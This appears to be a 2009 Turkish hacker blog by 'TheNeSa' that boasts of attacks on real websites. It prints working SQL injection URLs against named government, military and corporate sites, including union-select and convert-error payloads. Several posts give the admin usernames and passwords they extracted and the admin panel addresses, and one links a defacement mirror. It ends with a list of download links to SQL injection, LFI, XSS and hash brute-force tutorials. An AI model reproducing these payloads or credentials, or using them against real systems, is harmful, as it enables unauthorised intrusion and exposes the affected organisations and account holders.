http://www.batman-bld.gov.tr/haber_detay.asp?id=-236+union+select+0,1,2,admin,4,password+from+admin
8 Haziran 2009 Pazartesi
http://www.anamurtarim.gov.tr SQL
http://www.anamurtarim.gov.tr/www/haber_detay.asp?id=72+union+select+0,ksifre,kadi,3,4,5,6+from+kullanici
http://www.anamurtarim.gov.tr/www/yonetim/giris.asp
by TheNeSa
http://www.anamurtarim.gov.tr/www/yonetim/giris.asp
by TheNeSa
http://apac.sec.samsung.com SQL
Site:http://apac.sec.samsung.com
http://apac.sec.samsung.com/sg/mobile_phone/ultranista/viewdetails.asp?ID=77%20update+ultra_user_tbl+set+ScreenName=char(97)
tek harften fazla update yapabilen varsa yapsın S:
http://apac.sec.samsung.com/sg/mobile_phone/ultranista/viewdetails.asp?ID=77%20update+ultra_user_tbl+set+ScreenName=char(97)
tek harften fazla update yapabilen varsa yapsın S:
7 Haziran 2009 Pazar
http://www.airtahitinui-usa.com SQL
site:http://www.airtahitinui-usa.com/
password
http://www.airtahitinui-usa.com/atnspecial/atnspecial.asp?id=1299%20and%201=convert%20(int,%20(select%20top%201%20password%20from%20atn_res_login));--
username
http://www.airtahitinui-usa.com/atnspecial/atnspecial.asp?id=1299%20and%201=convert%20(int,%20(select%20top%201%20username%20from%20atn_res_login));--
username:jim
password:cctiare$
panel:
http://www.airtahitinui-usa.com/admin
htaccess şifreli galiba geçemedim :S
by TheNeSa
perweb.firat.edu.tr Hacked
site:http://perweb.firat.edu.tr
mirror:http://zone-h.org/mirror/id/8962924
sql injection
by TheNeSa
Amerikan Ordusu SQL www.trac.army.mil
site:http://www.trac.army.mil/
username
http://www.trac.army.mil/defaultbody.asp?cid=14%20and%201=convert%20(int,(select%20top%201%20username%20from%20adminuser))
password
http://www.trac.army.mil/defaultbody.asp?cid=14%20and%201=convert%20(int,(select%20top%201%20password%20from%20adminuser))
username:Mbauman
password:Cherry
http://www.trac.army.mil/admin
panel sayfası şifrelenmiş onu aşamadım :S
by TheNeSa ;)
username
http://www.trac.army.mil/defaultbody.asp?cid=14%20and%201=convert%20(int,(select%20top%201%20username%20from%20adminuser))
password
http://www.trac.army.mil/defaultbody.asp?cid=14%20and%201=convert%20(int,(select%20top%201%20password%20from%20adminuser))
username:Mbauman
password:Cherry
http://www.trac.army.mil/admin
panel sayfası şifrelenmiş onu aşamadım :S
by TheNeSa ;)
6 Haziran 2009 Cumartesi
Post Method Sql Injektion
Post Method Sql Injektion
http://rapidshare.com/files/118588418/Post_Method_Sql_Injektion.rar.html
kaynak:cw
http://rapidshare.com/files/118588418/Post_Method_Sql_Injektion.rar.html
kaynak:cw
PHP Script’s Sql Injektion
PHP Script’s Sql Injektion
http://rapidshare.com/files/115983366/php_script_s_sql_injektion.rar.html
kaynak:cw
http://rapidshare.com/files/115983366/php_script_s_sql_injektion.rar.html
kaynak:cw
Mysql Sql Injektion Mysql Userden Veri Çekme
Mysql Sql Injektion Mysql Userden Veri Çekme
http://rapidshare.com/files/115982532/mysql_sql_injektion_mysql_userden_veri_cekme.rar.html
kaynak:cw
http://rapidshare.com/files/115982532/mysql_sql_injektion_mysql_userden_veri_cekme.rar.html
kaynak:cw
Mysql Sql Injektion Kolon Sayısını Öğrenme
Mysql Sql Injektion Kolon Sayısını Öğrenme
http://rapidshare.com/files/115983110/mysql_sql_injektion_kolon_sayisini_ogrenme.rar.html
kaynak:cw
http://rapidshare.com/files/115983110/mysql_sql_injektion_kolon_sayisini_ogrenme.rar.html
kaynak:cw
MySql Sql Injektion
MySql Sql Injektion
http://rapidshare.com/files/115981217/mysql_sql_injektion.rar.html
kaynak:cw
http://rapidshare.com/files/115981217/mysql_sql_injektion.rar.html
kaynak:cw
Mssql Unclosed Veri Çekme
Mssql Unclosed Veri Çekme
http://rapidshare.com/files/115981552/mssql_unclosed_veri_cekme.rar.html
kaynak:cw
http://rapidshare.com/files/115981552/mssql_unclosed_veri_cekme.rar.html
kaynak:cw
Mssql Unclosed Update
Mssql Unclosed Update
http://rapidshare.com/files/115980219/mssql_unclosed_update.rar.html
kaynak:cw
http://rapidshare.com/files/115980219/mssql_unclosed_update.rar.html
kaynak:cw
Mssql Unclosed Add Meta
Mssql Unclosed Add Meta
http://rapidshare.com/files/115979743/mssql_unclosed_add_meta.rar.html
kaynak:cw
http://rapidshare.com/files/115979743/mssql_unclosed_add_meta.rar.html
kaynak:cw
Ms Acces Sql Injektion
Ms Acces Sql Injektion
http://rapidshare.com/files/115980304/ms_acces_sql_injektion.rar.html
kaynak:cw
http://rapidshare.com/files/115980304/ms_acces_sql_injektion.rar.html
kaynak:cw
MD5 Hash Brute Force Exploit Video
MD5 Hash Brute Force Exploit Video
http://rapidshare.com/files/115977249/md5_hash_brute_force_exploit_video.rar.html
kaynak:cw
http://rapidshare.com/files/115977249/md5_hash_brute_force_exploit_video.rar.html
kaynak:cw
Local File Inclusion (LFI)
Local File Inclusion (LFI)
http://rapidshare.com/files/115976579/local_file_inclusion.rar.html
kaynak:cw
http://rapidshare.com/files/115976579/local_file_inclusion.rar.html
kaynak:cw
Cros Site Scripting (Xss) Bulma
Cros Site Scripting (Xss) Bulma
http://rapidshare.com/files/115976604/cros_site_scripting__xss__bulma.rar.html
kaynak:cw
http://rapidshare.com/files/115976604/cros_site_scripting__xss__bulma.rar.html
kaynak:cw
Chmod Security Admin Bilgisizligi
Chmod Security Admin Bilgisizligi
http://rapidshare.com/files/115975077/chmod_security_admin_bilgisizligi.rar.html
Kaynak:cw
http://rapidshare.com/files/115975077/chmod_security_admin_bilgisizligi.rar.html
Kaynak:cw
Kaydol:
Kayıtlar (Atom)